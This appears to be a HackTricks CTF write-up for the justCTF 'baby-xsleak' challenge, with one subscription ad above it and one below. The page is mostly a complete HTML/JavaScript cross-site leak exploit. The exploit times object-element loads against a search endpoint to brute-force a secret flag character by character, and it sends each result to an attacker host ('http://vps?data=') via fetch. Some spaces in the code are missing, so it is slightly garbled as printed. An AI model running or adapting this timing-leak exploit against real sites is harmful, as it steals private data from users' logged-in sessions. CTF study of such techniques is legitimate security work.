Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
In this challenge the user could sent thousands of chars and if the flag was contained, the chars would be sent back to the bot. So putting a big amount of chars the attacker could measure if the flag was containing in the sent string or not.
Initially, I didn’t set object width and height, but later on, I found that it’s important because the default size is too small to make a difference in the load time.
<!DOCTYPEhtml><html><head></head><body> <imgsrc="https://deelay.me/30000/https://example.com"> <script>fetch('https://deelay.me/30000/https://example.com')functionsend(data) {fetch('http://vps?data='+encodeURIComponent(data)).catch(err =>1) }functionleak(char, callback) {returnnewPromise(resolve => {let ss ='just_random_string' let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
let start =performance.now()let object =document.createElement('object');object.width ='2000px'object.height ='2000px'object.data = url;object.onload= () => {object.remove()let end =performance.now()resolve(end - start) }object.onerror= () =>console.log('Error event triggered');document.body.appendChild(object); }) }send('start')let charset ='abcdefghijklmnopqrstuvwxyz_}'.split('')let flag ='justCTF{'asyncfunctionmain() {let found =0let notFound =0for(let i=0;i<3;i++) {awaitleak('..') }for(let i=0; i<3; i++) { found +=awaitleak('justCTF') }for(let i=0; i<3; i++) { notFound +=awaitleak('NOT_FOUND123') } found /=3 notFound /=3send('found flag:'+found)send('not found flag:'+notFound)let threshold = found - ((found - notFound)/2)send('threshold:'+threshold)if (notFound > found) {return }// exploitwhile(true) {if (flag[flag.length-1] ==='}') {break }for(let char of charset) {let trying = flag + charlet time =0for(let i=0; i<3; i++) { time +=awaitleak(trying) } time/=3send('char:'+trying+',time:'+time)if (time >= threshold) { flag += charsend(flag)break } } } }main() </script></body></html>
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!